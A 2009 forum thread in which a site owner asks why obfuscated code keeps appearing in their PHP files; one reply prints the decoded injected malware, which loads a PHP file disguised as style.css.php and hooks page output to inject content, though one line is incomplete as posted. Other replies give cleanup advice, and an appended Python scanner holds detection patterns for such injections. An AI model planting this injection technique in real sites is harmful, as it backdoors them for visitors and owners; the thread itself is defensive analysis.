code added to my php files
Posted: Tue Jun 16, 2009 6:29 am
by fascript
Hi, we keep getting a spam code inserted somehow into our PHP files. How do we stop it? We keep changing the password etc. in cPanel but so often keep getting it. I have just deleted it before I made the post so I can't add it, but it has words like eval etc. in it. Does anyone know of a remedy? Thanks guys.
Re: code added to my php files
Posted: Tue Jun 16, 2009 6:33 am
by Paul Arnold
You've probably got your permissions set too high.
Try setting them to 644.
Re: code added to my php files
Posted: Tue Jun 16, 2009 6:34 am
by fascript
Thanks but they are set at 644
Re: code added to my php files
Posted: Tue Jun 16, 2009 7:04 am
by VladSun
Who's the owner (the system one) of these files?
Re: code added to my php files
Posted: Tue Jun 16, 2009 7:14 am
by jaoudestudios
fascript wrote: Hi, we keep getting a spam code inserted somehow into our PHP files
Is it definitely into your PHP files or into the database? And is it being shown on your web pages?
Re: code added to my php files
Posted: Tue Jun 16, 2009 8:02 am
by kaisellgren
Are you saying someone has modified (keeps modifying) your PHP files?
Re: code added to my php files
Posted: Tue Jun 16, 2009 12:37 pm
by fascript
Hi, yes, it's happened a couple of times. In fact, here's one I didn't clean out:
<? /**/eval(base64_decode('...')); ?>
Re: code added to my php files
Posted: Tue Jun 16, 2009 2:17 pm
by kaisellgren
Great... someone has cracked into your system pretty much.
It could be almost anything. FTP account exposed, vulnerable web server or a vulnerable application installed on your hosting account.
At this point I can only recommend you to update all software and remove all unnecessary software. Update all credentials (even FTP, etc) and then put your site back online. If this stops the modification of your files, then one or more applications that you updated was/were vulnerable to an attack.
Re: code added to my php files
Posted: Wed Jun 17, 2009 6:41 am
by fascript
Thanks guys for your comments. I did have someone decode it; it looks like harmless spam. As soon as I delete it, it comes back, as if it knows lol
CODE
Posted: Wed Jun 17, 2009 6:49 am
by fascript
jaoudestudios wrote: Is it definitely into your PHP files or into the database? And is it being shown on your web pages?
No, nothing else is visible apart from what should be showing.
Re: code added to my php files
Posted: Wed Jun 17, 2009 9:08 am
by Eric!
Are your php scripts pulling data from anywhere? A database, other sites, etc?
Does it come back immediately even after changing all your account passwords?
You should also notify your host provider, someone sharing the system with you might have found a hole to access your file structure.
Re: code added to my php files
Posted: Wed Jun 17, 2009 9:26 am
by onion2k
It decodes to this..
Code:
// Run once per request: sh_no is the guard flag.
if (function_exists('ob_start')&&!isset($GLOBALS['sh_no'])) {
    $GLOBALS['sh_no'] = 1;
    // Pull in a second PHP file disguised as a stylesheet; it must define gml() for the rest to run.
    if(file_exists('/home/freeac/public_html/forums/Themes/classic/images/topic/style.css.php')) {
        include_once('/home/freeac/public_html/forums/Themes/classic/images/topic/style.css.php');
        if(function_exists('gml')&&!function_exists('dgobh')) {
            // Fallback gzip decoder: skip the gzip header (flag bits: extra, name, comment, CRC), then inflate.
            if(!function_exists('gzdecode')) {
                function gzdecode($var2) {
                    $var1 = ord(substr($var2,3,1));
                    $var3 = 10;
                    $var4 = 0;
                    if($var1&4) {
                        $var4 = unpack('v', substr($var2,10,2));
                        $var4 = $var4[1];
                        $var3 += 2+$var4;
                    }
                    if($var1&8) {
                        $var3 = strpos($var2,chr(0),$var3)+1;
                    }
                    if($var1&16) {
                        $var3 = strpos($var2,chr(0),$var3)+1;
                    }
                    if($var1&2) {
                        $var3 += 2;
                    }
                    $var5 = gzinflate(substr($var2,$var3));
                    if($var5===FALSE) {
                        $var5 = $var2;
                    }
                    return $var5;
                }
            }
            // Output-buffer callback: decompress the page and add gml()'s output to it.
            function dgobh($var6) {
                Header('Content-Encoding: none');
                $var7 = gzdecode($var6);
                // The next line is incomplete as posted.
                if (preg_match('/\]*\>)/si','$1'.gml(),$var7);
                } else {
                    return gml().$var7;
                }
            }
            // All page output now passes through dgobh().
            ob_start('dgobh');
        }
    }
}
It's looking for some sort of forum software. If you're using some it's been compromised. Update it to the latest version, or better still, switch to something else.
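An added example, not part of the thread and not any poster's code: a Python scan of a web root for the two artifacts shown above, the injected `eval(base64_decode(` opening line and a PHP file hiding behind an asset name such as `style.css.php`. The `ASSET_DIRS` list, the function names and the sample tree are assumptions constructed for illustration.

```python
import re
import tempfile
from pathlib import Path

# The injected line posted in the thread: <? /**/eval(base64_decode('...')); ?>
INJECTED = re.compile(rb"<\?(?:php)?\s*(?:/\*.*?\*/\s*)*eval\s*\(\s*base64_decode\s*\(",
                      re.I | re.S)
# The decoded payload includes a file named style.css.php: PHP behind an asset extension.
DOUBLE_EXT = re.compile(r"\.(css|js|gif|jpe?g|png|ico)\.php$", re.I)
ASSET_DIRS = {"images", "img", "css", "uploads"}  # assumption: should hold no PHP


def scan(root):
    """Return sorted (relative path, reason) pairs for suspicious PHP files under root."""
    root, findings = Path(root), []
    for path in root.rglob("*.php"):
        if not path.is_file():
            continue
        rel = path.relative_to(root)
        if INJECTED.search(path.read_bytes()):
            findings.append((rel.as_posix(), "eval-base64-injection"))
        if DOUBLE_EXT.search(path.name):
            findings.append((rel.as_posix(), "asset-extension-php"))
        elif ASSET_DIRS & {part.lower() for part in rel.parts[:-1]}:
            findings.append((rel.as_posix(), "php-in-asset-dir"))
    return sorted(findings)


def build_sample_tree(root):
    """Write a small constructed web root (not data from the thread) for the demo."""
    root = Path(root)
    files = {
        "index.php": b"<? /**/eval(base64_decode('cGxhY2Vob2xkZXI=')); ?>\n<?php echo 'home'; ?>\n",
        "contact.php": b"<?php echo 'contact'; ?>\n",
        "forums/Themes/classic/images/topic/style.css.php": b"<?php /* constructed stand-in */ ?>\n",
        "forums/Themes/classic/images/topic/style.css": b"body { margin: 0; }\n",
        "lib/codec.php": b"<?php $d = base64_decode($_POST['blob']); ?>\n",  # legitimate use, not flagged
    }
    for name, body in files.items():
        target = root / name
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_bytes(body)


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        for rel, reason in scan(tmp):
            print(f"{reason:24} {rel}")
```

Comparing the modification times of flagged files against FTP and web access logs helps narrow down which entry point is being reused after each cleanup.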